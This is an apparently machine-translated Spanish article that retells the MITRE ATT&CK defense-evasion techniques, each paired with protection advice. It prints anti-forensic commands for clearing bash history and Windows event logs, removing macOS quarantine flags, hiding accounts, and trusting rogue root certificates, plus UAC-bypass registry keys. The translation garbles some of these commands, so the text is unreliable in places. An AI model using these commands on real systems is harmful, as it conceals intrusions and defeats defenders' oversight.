Enlaces a todas las partes:Parte 1. Obtención del acceso inicial (acceso inicial)Parte 2. EjecuciónParte 3. Fijación (persistencia)Parte 4. Escalada de privilegiosParte 5. Evasión de defensaParte 6. Obtención de credenciales (acceso de credenciales)Parte 7. DescubrimientoParte 8. Movimiento lateralParte 9. Recolección de datos (Colección)Parte 10 ExfiltraciónParte 11. Comando y ControlLa sección "Evitar protección" describe las técnicas mediante las cuales un atacante puede ocultar actividades maliciosas y evitar su detección mediante herramientas de protección. Varias variaciones de técnicas de otras secciones de la cadena de ataque que ayudan a superar defensas específicas y medidas preventivas tomadas por el lado defensor se incluyen en las técnicas de derivación de defensa. A su vez, las técnicas de bypass de defensa se aplican en todas las fases de un ataque.
El autor no es responsable de las posibles consecuencias de aplicar la información establecida en el artículo, y también se disculpa por posibles imprecisiones hechas en algunas formulaciones y términos. La información publicada es un recuento gratuito de los contenidos de MITER ATT & CK .Sistema: Windows
Derechos: Usuario, Administrador
Descripción: los atacantes pueden usar tokens de acceso para realizar acciones en diversos contextos de seguridad del usuario o del sistema, evitando así la detección de actividad maliciosa. Un adversario puede usar las funciones API de Windows para copiar tokens de acceso de procesos existentes (robo de tokens), para esto debe estar en el contexto de un usuario privilegiado (por ejemplo, un administrador). El robo de tokens de acceso se usa generalmente para elevar los privilegios del administrador al Sistema. Un adversario también puede usar un token de acceso a la cuenta para la autenticación en un sistema remoto, si esta cuenta tiene los permisos necesarios en el sistema remoto. Hay tres formas principales de abusar de los tokens de acceso.
Robo y suplantación de tokens.La suplantación de tokens es la capacidad del sistema operativo para iniciar subprocesos en un contexto de seguridad distinto del contexto del proceso al que pertenece este subproceso. En otras palabras, la personificación de los tokens le permite realizar cualquier acción en nombre de otro usuario. Un adversario puede duplicar un token de acceso usando la función
DuplicateTokenEX y usar
ImpersonateLoggedOnUser para llamar a un hilo en el contexto de un usuario conectado, o usar
SetThreadToken para asignar un token de acceso a una secuencia.
Cree un proceso utilizando un token de acceso.Un atacante puede crear un token de acceso utilizando la función
DuplicateTokenEX y luego usarlo con
CreateProcessWithTokenW para crear un nuevo proceso que se ejecute en el contexto del usuario suplantado.
Obtención y suplantación de tokens de acceso.Un adversario, que tiene un nombre de usuario y una contraseña, puede crear una sesión de inicio de sesión utilizando la función
LogonUser API, que devolverá una copia del token de acceso de sesión de una nueva sesión y luego, utilizando la
función SetThreadToken , asigne el token recibido a la secuencia.
Metasploit Meterpreter y
CobaltStrike tienen herramientas para manipular tokens de acceso para elevar los privilegios.
Recomendaciones de protección: para hacer un uso completo de las tácticas anteriores, un atacante debe tener derechos de administrador del sistema, así que no olvide limitar los privilegios de los usuarios comunes. Cualquier usuario puede engañar a los tokens de acceso si tienen credenciales legítimas. Limite la capacidad de los usuarios y grupos para crear tokens de acceso:
GPO: Configuración del equipo> [Políticas]> Configuración de Windows> Configuración de seguridad> Políticas locales> Asignación de derechos de usuario: Crear un objeto de token .
También determine quién puede reemplazar los tokens de proceso de servicios locales o de red:
GPO: Configuración del equipo> [Políticas]> Configuración de Windows> Configuración de seguridad> Políticas locales> Asignación de derechos de usuario: Reemplace un token de nivel de proceso.Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: El Servicio de transferencia inteligente en segundo plano de Windows (BITS) es un mecanismo para transferir archivos asincrónicamente a través del Modelo de objetos componentes (COM) utilizando un ancho de banda bajo. BITS generalmente es utilizado por actualizadores, mensajeros instantáneos y otras aplicaciones que prefieren trabajar en segundo plano sin interrumpir el funcionamiento de otras aplicaciones de red. Las tareas de transferencia de archivos se representan como tareas BITS que contienen una cola de una o más operaciones de archivo. La interfaz para crear y administrar tareas BITS está disponible en las herramientas PowerShell y BITSAdmin. Los atacantes pueden usar BITS para descargar, iniciar y luego limpiar después de ejecutar código malicioso. Las tareas de BITS se almacenan de forma autónoma en la base de datos de BITS, mientras que el sistema no crea nuevos archivos o entradas de registro, a menudo el firewall permite BITS. Con las tareas de BITS, puede afianzarse en el sistema creando tareas largas (de forma predeterminada, 90 días) o llamando a un programa arbitrario después de completar una tarea o error de BITS (incluso después de reiniciar el sistema operativo).
Recomendaciones de protección: BITS es una funcionalidad estándar del sistema operativo, cuyo uso es difícil de distinguir de la actividad maliciosa, por lo tanto, el vector de protección debe estar dirigido a evitar el lanzamiento de herramientas maliciosas al comienzo de la cadena de ataque. Deshabilitar BITS por completo puede detener las actualizaciones de software legítimas, sin embargo, puede considerar restringir el acceso a la interfaz BITS a usuarios y grupos de acceso específicos, y también puede limitar la vida útil de las tareas de BITS, que se configura cambiando las siguientes teclas:
- HKEY_LOCAL_MACHINE \ Software \ Políticas \ Microsoft \ Windows \ BITS \ JobInactivityTimeout;
- HKEY_LOCAL_MACHINE \ Software \ Políticas \ Microsoft \ Windows \ BITS \ MaxDownloadTime .
Sistema: Windows, Linux, macOS
Descripción: algunas funciones de seguridad escanean archivos buscando firmas estáticas. Los opositores pueden agregar datos a archivos maliciosos para aumentar su tamaño a un valor que exceda el tamaño máximo permitido del archivo escaneado o cambiar el hash del archivo para omitir las listas de bloqueo de hash del inicio del archivo por hash.
Recomendaciones de protección: Proporcione identificación de software potencialmente peligroso mediante la aplicación de herramientas como
AppLocker , herramientas de lista blanca y políticas de restricción de software.
Sistema: Windows
Derechos: Usuario, Administrador
Descripción: Hay muchas formas de evitar UAC, las más comunes se implementan en el proyecto
UACMe . Se descubren nuevas formas de evitar UAC, como abusar de la aplicación del sistema
eventvwr.exe , que puede ejecutar un archivo binario o un script elevado. Los programas maliciosos también pueden integrarse en procesos confiables mediante los cuales UAC permite la escalada de privilegios sin preguntar a un usuario.
Para omitir el UAC usando eventvwr.exe, la clave se modifica en el registro de Windows:
[HKEY_CURRENT_USER] \ Software \ Classes \ mscfile \ shell \ open \ command .
Para omitir el UAC usando sdclt.exe, se modifican las claves en el registro de Windows:
[HKEY_CURRENT_USER] \ Software \ Microsoft \ Windows \ CurrentVersion \ App Paths \ control.exe;
[HKEY_CURRENT_USER] \ Software \ Classes \ exefile \ shell \ runas \ command \ isolatedCommand.Recomendaciones de protección: elimine a los usuarios del grupo de administradores locales en los sistemas protegidos. Si es posible, habilite el nivel más alto de protección en la configuración de UAC.
Sistema: Windows
Derechos: usuario
Descripción: Microsoft Connection Manager Profile Installer (cmstp.exe) es la utilidad "Connection Manager Profile Installer" integrada en Windows. Cmstp.exe puede tomar un archivo inf como parámetro, por lo que un atacante podría preparar un INF malicioso especial para descargar y ejecutar archivos DLL o scriptlets (* .sct) desde servidores remotos sin pasar por AppLocker y otros bloqueos, porque cmstp.exe está firmado con un certificado digital de Microsoft.
Recomendaciones de protección: bloquear el lanzamiento de aplicaciones potencialmente peligrosas. Supervisión o bloqueo completo de
C: \ Windows \ System32 \ cmstp.exe se inicia .
Sistema: Linux, macOS
Derechos: usuario
Descripción: para comodidad de los usuarios en sistemas macOS y Linux, todos los comandos ejecutados por el usuario en el terminal se registran. Los usuarios pueden ejecutar rápidamente un comando que habían realizado previamente en otra sesión. Cuando un usuario inicia sesión en el sistema, el historial de comandos se guarda en el archivo que se especifica en la variable HISTFILE. Cuando el usuario cierra sesión, el historial de comandos se guarda en el directorio de inicio del usuario ~ / .bash_history. El archivo del historial de comandos también puede contener contraseñas ingresadas por el usuario en texto claro. Los atacantes pueden buscar contraseñas en los archivos del historial de comandos y tomar medidas para evitar que su actividad maliciosa se escriba en el historial de comandos, por ejemplo:
HISTFILE sin configurar;
export HISTFILESIZE = 0;
historia -c;
rm ~ / .bash_history.Recomendaciones de protección: evitar que los usuarios eliminen o escriban archivos bash_history puede evitar que un adversario abuse de estos archivos; además, restringir los derechos del usuario para editar las variables HISTFILE y HISTFILESIZE preservará el registro de ejecución del comando.
Sistema: Windows, macOS
Descripción: la firma digital del código proporciona autenticación del desarrollador y una garantía de que el archivo no se ha modificado. Sin embargo, como saben, los oponentes pueden usar firmas para disfrazar el malware como archivos binarios legítimos. Los certificados de firma digital pueden ser creados, manipulados o robados por un atacante. La firma de código para la verificación del software en el primer inicio se usa en Windows, macOS, OS X y no se usa en Linux debido a la estructura descentralizada de la plataforma. Los certificados de firma de código se pueden usar para omitir las políticas de seguridad que requieren que solo el código firmado se ejecute en el sistema.
Recomendaciones de protección: El uso de "listas blancas" del software y la selección de editores de software confiables antes de verificar la firma digital pueden evitar la ejecución de código malicioso o no confiable en el sistema protegido.
Sistema: Windows
Derechos: sistema
Descripción: algunos ciberdelincuentes pueden usar herramientas sofisticadas para comprometer los componentes de la computadora e instalar firmware malicioso en ellos que ejecutará código malicioso fuera del sistema operativo o incluso el firmware del sistema principal (Bios). La técnica consiste en flashear componentes de computadora que no tienen un sistema de verificación de integridad incorporado, por ejemplo, discos duros. Un dispositivo con firmware malicioso puede proporcionar acceso constante al sistema atacado a pesar de las fallas y la sobrescritura del disco duro. La técnica está diseñada para superar la protección del software y el control de integridad.
Sistema: Windows
Derechos: usuario
Descripción: Microsoft Component Object Model (COM) es una tecnología para crear software basado en componentes interactivos de un objeto, cada uno de los cuales se puede usar en muchos programas simultáneamente. Los atacantes pueden usar COM para inyectar código malicioso que se puede ejecutar en lugar de uno legítimo capturando enlaces y enlaces COM. Para interceptar un objeto COM, debe reemplazar el enlace a un componente legítimo del sistema en el registro de Windows. Una nueva llamada a este componente ejecutará código malicioso.
Recomendaciones de protección: no se recomiendan medidas preventivas para prevenir este ataque, ya que los objetos COM son parte del sistema operativo y están instalados en el software del sistema. Bloquear cambios en los objetos COM puede afectar la estabilidad del sistema operativo y el software. Se recomienda el vector de protección para bloquear software malicioso y potencialmente peligroso.
Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: La táctica es utilizar los elementos del Panel de control de Windows por parte de los atacantes para ejecutar comandos arbitrarios como carga útil (por ejemplo, el virus
Reaver ). Los objetos maliciosos pueden disfrazarse como controles estándar y entregarse al sistema utilizando archivos adjuntos de phishing. Las utilidades para ver y configurar los ajustes de Windows son archivos exe registrados y archivos CPL de elementos del panel de control de Windows. Los archivos CPL en realidad son DLL renombrados que se pueden ejecutar de las siguientes maneras:
- directamente desde la línea de comando: control.exe <file.cpl> ;
- utilizando las funciones API de shell32.dll: rundll32.exe shell32.dll, Control_RunDLL <file.cpl> ;
- haga doble clic en el archivo cpl.
Las CPL registradas almacenadas en System32 se muestran automáticamente en el Panel de control de Windows y tienen un identificador único almacenado en el registro:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpaceLa información sobre otras CPL, por ejemplo, el nombre para mostrar y la ruta al archivo cpl, se almacena en las
secciones Cpl y
Propiedades extendidas de la sección:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Panel de controlAlgunas CPL lanzadas a través del shell se registran en la sección:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlersRecomendación de protección: restrinja el inicio y el almacenamiento de archivos de elementos del panel de control solo en carpetas protegidas (por ejemplo,
C: \ Windows \ System32 ), habilite el Control de cuentas de usuario (UAC) y AppLocker para evitar cambios no autorizados en el sistema. Por supuesto, el uso de software antivirus.
Sistema: Windows
Derechos: administrador
Descripción: DCShadow implica crear un controlador de dominio falso en la red atacada con la ayuda de la cual, utilizando la funcionalidad API para interactuar con el CD atacado, un atacante puede modificar los datos de AD, incluidos los cambios a cualquier objeto de dominio, credenciales y claves, inadvertidos por los sistemas SIEM. El kit de herramientas para implementar el ataque es parte de mimikatz. DCShadow se puede utilizar para realizar un ataque de inyección SID-History y para crear puertas traseras para una mayor consolidación en el sistema.
Recomendaciones de protección: dado que la técnica DCShadow se basa en el abuso de las características de diseño de AD, el vector de protección debe estar dirigido para evitar el lanzamiento de herramientas de ataque. Se puede detectar un ataque analizando la replicación de red de la replicación de CD, que se ejecuta cada 15 minutos, pero puede ser causada por un atacante fuera del horario.
Sistema: Windows
Derechos: usuario, administrador, sistema
Descripción: la técnica consiste en explotar vulnerabilidades en el algoritmo para encontrar mediante las aplicaciones los archivos DLL que necesitan para funcionar (
MSA2269637 ). A menudo, el directorio de búsqueda de DLL es el directorio de trabajo del programa, por lo que los atacantes pueden reemplazar la DLL de origen por una maliciosa con el mismo nombre de archivo.
Los ataques remotos en búsquedas de DLL se pueden llevar a cabo cuando el programa instala su directorio actual en un directorio remoto, por ejemplo, un recurso compartido de red. Además, los atacantes pueden cambiar directamente el método de búsqueda y carga de archivos DLL reemplazando los archivos .manifest o .local, que describen los parámetros de búsqueda de DLL. Si el programa atacado funciona con un alto nivel de privilegios, la DLL maliciosa cargada por él también se ejecutará con altos derechos. En este caso, la técnica se puede utilizar para aumentar los privilegios del usuario al administrador o al sistema.
Recomendaciones de protección: evite la carga remota de DLL (habilitada de manera predeterminada en Windows Server 2012+ y disponible con actualizaciones para XP + y Server 2003+). Habilita el modo de búsqueda segura para archivos DLL, que restringe los directorios de búsqueda a directorios como
% SYSTEMROOT% antes de realizar una búsqueda de DLL en el directorio de la aplicación actual.
Habilitar el modo de búsqueda segura de DLL:
Configuración del equipo> [Políticas]> Plantillas administrativas> MSS (Legacy): MSS: (SafeDllSearchMode) Habilite el modo de búsqueda de DLL seguro.Clave de registro correspondiente:
HKLM \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ SafeDLLSearchMode.Considere auditar un sistema protegido para corregir deficiencias de DLL utilizando herramientas como PowerUP en PowerSploit. No olvides bloquear el software malicioso y potencialmente peligroso, así como seguir las
recomendaciones de Microsoft .
Sistema: Windows
Descripción: El ataque se basa en vulnerabilidades de la tecnología de ejecución paralela en paralelo (WinSxS o SxS), cuya esencia es habilitar aplicaciones que utilizan versiones incompatibles de los mismos componentes de código. El repositorio de ensamblaje de componentes se encuentra en la carpeta c: \ windows \ winsxs. Cada ensamblaje debe tener asociado un manifiesto: un archivo xml que contenga información sobre archivos, clases, interfaces, bibliotecas y otros elementos del ensamblaje. De manera similar a las técnicas de secuestro de una búsqueda de DLL, los adversarios pueden provocar que una aplicación de usuario cargue "lateralmente" una DLL maliciosa, la ruta a la que se especificó en el archivo de manifiesto del ensamblado.
% TEMP% \ RarSFX% \% PERFIL DE LOS USUARIOS% \ SXS;
% TEMP% \ RarSFX% \% ALLUSERS PROFILE% \ WinSxS.Recomendaciones de protección: actualizaciones periódicas de software, instalación de aplicaciones en directorios protegidos contra escritura. Usando sxstrace.exe para verificar los archivos de manifiesto por vulnerabilidades de carga tardía.
Sistema: Windows
Derechos: usuario
Descripción: los atacantes pueden utilizar la ofuscación de archivos e información para ocultar códigos maliciosos y artefactos que quedan de una invasión.
Para usar dichos archivos, los oponentes usan técnicas inversas para desofuscar / decodificar archivos o información. Dichos métodos pueden implicar el uso de malware, varios scripts o utilidades del sistema, por ejemplo, existe un método conocido para usar la utilidad certutil para decodificar el archivo ejecutable de una herramienta de acceso remoto oculto dentro de un archivo de certificado. Otro ejemplo es el uso del comando copu / b para recopilar fragmentos binarios en una carga maliciosa (Payload).Los archivos de carga se pueden comprimir, archivar o cifrar para evitar la detección. A veces, se puede requerir una acción del usuario para realizar la desofuscación o descifrado. El usuario puede necesitar ingresar una contraseña para abrir un archivo comprimido o encriptado o script con contenido malicioso.Recomendaciones de protección: identificación y bloqueo de utilidades innecesarias del sistema o software potencialmente peligroso que se puede utilizar para desofuscar o descifrar archivos utilizando herramientas como AppLocker y políticas de restricción de software.Sistema: Windows, Linux, macOSDescripción: los atacantes pueden deshabilitar varias herramientas de seguridad, destruir procesos de registro de eventos, claves de registro para que las herramientas de seguridad no se inicien durante actividades maliciosas o utilizar otros métodos para interferir con el funcionamiento de escáneres de seguridad o informes de eventos.Recomendaciones de protección: asegúrese de que los derechos de acceso a los procesos, el registro y los archivos estén configurados correctamente para evitar desconexiones no autorizadas o interferencias con el funcionamiento de las herramientas de seguridad.Sistema: Windows, Linux, macOSDerechos: Descripción del usuario : Al igual que con cualquier software, el software de seguridad puede tener vulnerabilidades que podrían ser explotadas por un atacante para deshabilitarlas o evitarlas.Recomendaciones de protección: actualizaciones periódicas de software, desarrollo e implementación de un proceso de gestión de vulnerabilidades de software. El uso de aplicaciones de virtualización y microsegmentación puede reducir los riesgos de una posible explotación de vulnerabilidades.Sistema: Derechos de Windows : Administrador,Descripción del sistema : La técnica consiste en abusar de la memoria adicional de la ventana de Windows, la denominada Memoria de ventana adicional (EWM). El tamaño de EWM es de 40 bytes, adecuado para almacenar un puntero de 32 bits y se usa a menudo para indicar una referencia a los procedimientos. Los programas maliciosos durante la cadena de ataque pueden colocar un puntero a código malicioso en el EWM, que posteriormente se iniciará mediante el proceso de la aplicación infectada.Recomendaciones de protección:Dado que las técnicas de inyección EWM se basan en el abuso de las funciones de desarrollo del sistema operativo, los esfuerzos de protección deben dirigirse a prevenir el lanzamiento de programas maliciosos y herramientas maliciosas. Es una buena práctica identificar y bloquear software potencialmente peligroso mediante AppLocker, incluir aplicaciones en la lista blanca o aplicar Políticas de restricción de software.Sistema: Windows, Linux, macOSDerechos: Descripción del usuario : Varias herramientas, malware y otros archivos utilizados por el adversario pueden dejar rastros de actividad de piratas informáticos en el sistema. Los atacantes pueden eliminar estos archivos de artefactos durante una invasión para reducir la probabilidad de que se detecte un ataque o eliminarlos al final de su operación. El adversario puede usar tanto herramientas especiales para la destrucción garantizada de información (por ejemplo, Windows Sysinternals Sdelete) como herramientas integradas en el sistema operativo, por ejemplo DEL y ipher.Recomendaciones de protección: si es posible, bloquee el inicio de utilidades innecesarias del sistema, herramientas de terceros y software potencialmente peligroso que puede usarse para destruir archivos.Sistema: Derechos de Windows :Descripción del administrador : Windows puede permitir que los programas accedan directamente a volúmenes lógicos. Los programas con acceso directo pueden leer y escribir archivos directamente en el disco duro, analizar la estructura de datos del sistema de archivos. Este método omite el control de acceso a archivos y la supervisión del sistema de archivos. Las utilidades como NinjaCopy sirven para realizar las acciones anteriores en PowerShell.Recomendaciones de protección: Bloqueo de software potencialmente peligroso.Sistema: macOSDerechos: Usuario, AdministradorDescripción:MacOS y OS X utilizan la tecnología Gatekeper, que solo ejecuta software de confianza. Al descargar una aplicación de Internet, se establece un atributo especial en el archivo com.apple.quarantine, que indica que Gatekeeper debe pedirle al usuario permiso para ejecutar el archivo descargado. El indicador se establece antes de guardar el archivo en el disco, luego, cuando el usuario intenta abrir el archivo, Gatekeeper comprueba el indicador correspondiente y, si lo hay, el sistema le solicitará al usuario que confirme el inicio y muestre la URL desde la que se descargó el archivo. Las aplicaciones descargadas al sistema desde una unidad USB, óptica, de niños o de red no harán que el indicador se establezca en el archivo com.apple.quarantine. Algunas utilidades y archivos que ingresaron al sistema atacado durante el arranque en la sombra (técnica Drive-by-compromise),tampoco hace que se establezca el indicador para Gatekeeper, evitando así la comprobación de proxy. La presencia de la bandera de cuarentena se puede verificar con el comando:xattr /path/to/MyApp.app .El indicador también se puede eliminar con attr, pero esto requerirá una escalada de privilegios:sudo xattr -r -d com.apple.quarantine /path/to/MyApp.appRecomendaciones de seguridad: además de Gatekeeper, debe usar la prohibición de iniciar aplicaciones que no se descargan de Apple Store.Sistema: Linux, macOSDerechos: Descripción del usuario : La variable de entorno HISTCONTROL representa una lista de parámetros para guardar el historial de comandos en el archivo ~ / .bash_history cuando el usuario cierra la sesión. Por ejemplo, la opción ignorespace indica que no es necesario guardar líneas que comienzan con un espacio, y la opción ignoredups deshabilitará el guardado de comandos que se repiten en una fila. En algunos sistemas Linux, la opción ignorar se especifica por defecto, lo que implica la inclusión de los dos parámetros anteriores. Esto significa que el comando ls no se guardará en el historial, a diferencia de ls.HISTCONTROL no se usa de manera predeterminada en macOS, pero el usuario puede configurarlo. Los atacantes pueden usar las características de los parámetros HISTCONTROL para no dejar rastros de su actividad simplemente insertando espacios delante de los comandos.Recomendaciones de protección: evite que los usuarios cambien la variable HISTCONTROL y también asegúrese de que HISTCONTROL esté configurado en ignoredup y no contenga las opciones ignoreboth e ignorespace.Sistema: Windows, Linux, macOSDerechos: Descripción del usuario : en Windows, los usuarios pueden ocultar archivos con el comando attrib. Es suficiente especificar el atributo + h <nombre de archivo> para ocultar el archivo o "+ s" para marcar el archivo como sistema. Al agregar el parámetro "/ S", la utilidad attrib aplicará los cambios de forma recursiva. En Linux / Mac, los usuarios pueden ocultar archivos y carpetas simplemente especificando un "." Al comienzo del nombre del archivo. Después de eso, los archivos y las carpetas se ocultarán de la aplicación Finder y, como la utilidad ls.En macOS, los archivos se pueden marcar con UF_HIDDEN, lo que deshabilitará su visibilidad en Finder.app, pero no evitará que se vean archivos ocultos en Terminal.app. Muchas aplicaciones crean archivos y carpetas ocultos para no saturar el espacio de trabajo del usuario. Por ejemplo, las utilidades SSH crean una carpeta oculta .ssh que almacena una lista de hosts conocidos y claves de usuario.Los atacantes pueden usar la capacidad de ocultar archivos y carpetas para no atraer la atención de los usuarios.Recomendaciones de protección: Evitar el uso de esta técnica es difícil debido a que ocultar archivos es una característica estándar del sistema operativo.Sistema: derechos de macOS : Administrador, raízDescripción: Cada cuenta de macOS tiene un ID de usuario que se puede especificar durante la creación del usuario. Las propiedades /Library/Preferences/com.apple.loginwindow tienen la opción Hide500Users , que oculta los ID de usuario 500 y por debajo a la pantalla de inicio de sesión. Por lo tanto, al crear un usuario con un identificador <500 y habilitar Hide500Users, un atacante puede ocultar sus cuentas:sudo dscl. -create / User / username UniqueID 401
sudo defaults escribe /Library/Preferences/com.apple.loginwindow Hide500Users -bool TRUERecomendaciones de protección:Si la estación de trabajo está en un dominio, la política de grupo puede limitar la capacidad de crear y ocultar usuarios. Del mismo modo, se impide la capacidad de modificar las propiedades /Library/Preferences/com.apple.loginwindow.Sistema: derechos de macOS :Descripción del usuario : Las opciones de inicio de aplicaciones en macOS y OS X se enumeran en los archivos de propiedades. Una de las etiquetas en estos archivos apple.awt.UIElement incluye ocultar el icono de la aplicación Java del Dock. Por lo general, esta etiqueta se usa para aplicaciones que se ejecutan en la bandeja del sistema, pero los atacantes pueden abusar de esta función y ocultar aplicaciones maliciosas.Recomendaciones de protección: supervise la lista de programas que tienen la etiqueta apple.awt.UIElement en las propiedades de plist.Sistema: Derechos de Windows : Administrador,Descripción del sistema : El mecanismo de Opciones de ejecución de archivos de imagen (IFEO) le permite ejecutar un depurador de programa en lugar de un programa, previamente especificado por el desarrollador en el registro:- HKLM \ Software \ Microsoft \ Windows NT \ CurrentVersion \ Opciones de ejecución de archivos de imagen / [ejecutable]
- HKLM \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ [ejecutable] , donde [ejecutable] es el binario ejecutable del depurador.
Al igual que las inyecciones, se puede abusar del valor [ejecutable] ejecutando código arbitrario para aumentar los privilegios u obtener un punto de apoyo en el sistema. Los programas maliciosos pueden usar IFEO para eludir la protección mediante el registro de depuradores que redirigen y rechazan diversas aplicaciones del sistema y de seguridad.Recomendaciones de protección: La técnica descrita se basa en el abuso de las herramientas de desarrollo de SO normales, por lo que cualquier restricción puede causar inestabilidad de software legítimo, por ejemplo, aplicaciones de seguridad. Los esfuerzos para evitar el uso de las técnicas de inyección de IFEO deben centrarse en las primeras etapas de la cadena de ataque. Puede detectar dicho ataque monitoreando procesos con Debug_process yDebug_only_this_process .Sistema: WindowsDescripción: los atacantes pueden intentar bloquear varios indicadores o eventos capturados por las herramientas de seguridad para su posterior análisis. La actividad maliciosa puede incluir la modificación de archivos de configuración de seguridad, claves de registro o la redirección maliciosa de eventos de telemetría.Cuando se trata de herramientas de análisis de actividad de red, un atacante puede bloquear el tráfico asociado con el envío de informes al servidor de administración de seguridad. Esto puede hacerse de muchas maneras, por ejemplo, deteniendo el proceso local responsable de transmitir telemetría, creando una regla en el firewall para bloquear el tráfico a los hosts responsables de agregar eventos de seguridad.Recomendaciones de protección:Asegúrese de que los rastreadores y los remitentes de eventos, las políticas de firewall y otros mecanismos relacionados estén protegidos por los permisos y controles de acceso adecuados. Considere reiniciar automáticamente la función de reenvío de eventos de seguridad a intervalos repetidos, así como la capacidad de aplicar la gestión de cambios adecuada a las reglas del firewall y otras configuraciones del sistema.Sistema: Windows, Linux, macOSDescripción:Si una aplicación maliciosa se pone en cuarentena o se bloquea de otra manera, el atacante puede determinar la razón para detectar su herramienta (indicador), cambiar la herramienta quitando el indicador y usar una versión actualizada del malware que no se detectará por medios de protección. Un buen ejemplo es la detección de malware utilizando una suma de verificación o firma de archivo y poniéndolos en cuarentena con un software antivirus. Un atacante que determina que un software antivirus ha puesto en cuarentena un malware debido a su firma / suma de verificación puede usar técnicas de empaquetado de software u otros métodos para modificar un archivo para cambiar la firma o suma de verificación, y luego reutilizar este malware.Recomendaciones de protección:El adversario puede tener acceso al sistema y saber qué métodos y herramientas están bloqueados por la protección del residente. Utilice métodos avanzados de configuración de seguridad y características de seguridad, explore el proceso de posible compromiso del sistema protegido para organizar el proceso de advertencia sobre una posible intrusión.Identifique y bloquee software potencialmente peligroso y malicioso utilizando herramientas de lista blanca como AppLocker y políticas de restricción de software.La primera detección de una herramienta maliciosa puede activar una alerta a un sistema antivirus u otra herramienta de seguridad. Dichos eventos pueden ocurrir en el perímetro y pueden detectarse utilizando un sistema IDS, escaneo de correo, etc. La detección inicial debe considerarse como un signo del comienzo de la invasión, que requiere una investigación cuidadosa fuera del "lugar" del evento inicial. Los atacantes pueden continuar el ataque, suponiendo que ciertos eventos de software antivirus no serán investigados o que el analista no podrá asociar permanentemente el evento registrado con otra actividad que tenga lugar en la red.Sistema: Windows, Linux, macOSDescripción: Los atacantes pueden eliminar o modificar los artefactos generados en el sistema atacado, incluidos los registros y los archivos interceptados en cuarentena. La ubicación y el formato de los registros pueden variar según el sistema operativo, los registros del sistema se registran como eventos de Windows o archivos Linux / macOS como /.bash_history y .var / log / *.Las acciones dirigidas que interfieren con el funcionamiento de la recopilación de eventos y los mecanismos de advertencia que podrían usarse para detectar intrusiones pueden comprometer las herramientas de seguridad, como resultado de lo cual los eventos de seguridad no serán analizados. Dichas acciones pueden complicar el proceso de examen y respuesta debido a la falta de datos sobre la incursión.Borrar registros de eventos de Windows Los registros de eventos deWindows son un registro de alertas y notificaciones y el funcionamiento del sistema. Microsoft define el evento como "cualquier evento significativo en un sistema o programa que requiera notificación a los usuarios o registro". Hay tres fuentes de eventos del sistema: sistema, aplicaciones y seguridad.Opositores que realizan acciones relacionadas con la administración de cuentas, iniciar sesión en una cuenta, acceder a servicios de directorio, etc. puede borrar el registro de eventos para ocultar sus acciones.Los registros de eventos se pueden limpiar con las siguientes utilidades de consola:wevtutil cl system;
aplicación wevtutil cl;
wevtutil cl seguridad.Los registros también se pueden borrar utilizando otras herramientas, como PowerShell.Recomendaciones de protección: utilice el almacenamiento centralizado de registros de eventos para que no sea posible ver y administrar registros de eventos en la máquina local. Si es posible, minimice el retraso de tiempo al informar eventos para evitar el almacenamiento de registros a largo plazo en el sistema local. Proteja los archivos de registro de eventos almacenados localmente con los permisos y la autenticación adecuados, restrinja la capacidad de los adversarios para elevar los privilegios. Use herramientas para ofuscar y cifrar archivos de registro cuando se almacenan localmente y durante la transferencia. Monitoree los registros para el evento 1102: "El registro de auditoría ha sido eliminado".Sistema: Derechos de Windows :Descripción del usuario : Se pueden usar varias utilidades de Windows para ejecutar comandos, posiblemente sin invocar cmd. Por ejemplo, Forfiles, el asistente de compatibilidad de programas (pcalua.exe), componentes del subsistema de Windows para Linux (WSL), así como otras utilidades, pueden ejecutar programas y comandos desde la interfaz de línea de comandos, la ventana Ejecutar o mediante scripts.Los atacantes pueden abusar de las utilidades mencionadas anteriormente para evitar las herramientas de seguridad, en particular para el lanzamiento de archivos arbitrarios hasta que su actividad sea detectada o bloqueada por diversos medios, por ejemplo, utilizando políticas grupales que prohíban el uso de CMD.Recomendaciones de protección:Identifique y bloquee software potencialmente peligroso y malicioso utilizando AppLocker y las políticas de restricción de software. Estos mecanismos se pueden usar para deshabilitar o restringir el acceso del usuario a las utilidades que se pueden usar para ejecutar comandos indirectamente.Sistema: Windows, Linux, macOS
Derechos: administrador, usuario
Descripción: los certificados raíz se utilizan para identificar una autoridad de certificación (CA). Cuando se instala el certificado raíz, el sistema y las aplicaciones confiarán en todos los certificados en la cadena de certificados raíz. Los certificados se usan generalmente para establecer conexiones TLS / SSL seguras en un navegador web. Si un usuario intenta abrir un sitio en el que se presenta un certificado no confiable, aparecerá un mensaje de error que advierte al usuario sobre un riesgo de seguridad. Dependiendo de la configuración de seguridad, el navegador puede prohibir las conexiones a sitios no confiables.
La instalación de un certificado raíz en un sistema atacado permite que un atacante reduzca el nivel general de seguridad del sistema. Los atacantes pueden usar este método para ocultar advertencias de seguridad, como resultado de lo cual el usuario se conectará a través de HTTPS a servidores web controlados por el enemigo para robar sus credenciales.
Los certificados raíz extraños también pueden ser preinstalados por el fabricante del software, ya sea durante la cadena de suministro del software y usarse junto con malware y adware, o para proporcionar un ataque de "persona intermedia" para interceptar la información transmitida a través de conexiones TLS / SSL seguras.
Los certificados raíz también se pueden clonar y reinstalar. Dichas cadenas de certificados se pueden usar para firmar código malicioso con el fin de evitar las herramientas de verificación de firma utilizadas para bloquear y detectar intrusiones.
En macOS, el malware Ay MaMi usa el comando
/ usr / bin / security add-Trusted-cert -d -r trustRoot -k / Library / Keychains / System / keychain path / to /icious / cert para establecer el certificado como un certificado raíz de confianza en cadena del sistema
Recomendaciones de seguridad: HTTP Public Key Pinning (HPKP) es una forma de protección contra ataques de cadena de certificados. HPKP supone que el servidor le dice al cliente un conjunto de hashes de clave pública, que deberían ser los únicos confiables cuando se conecta a este servidor durante un tiempo determinado.
La directiva de grupo de Windows se puede usar para administrar certificados raíz y evitar que los no administradores instalen certificados raíz adicionales en repositorios de usuarios (HKCU):
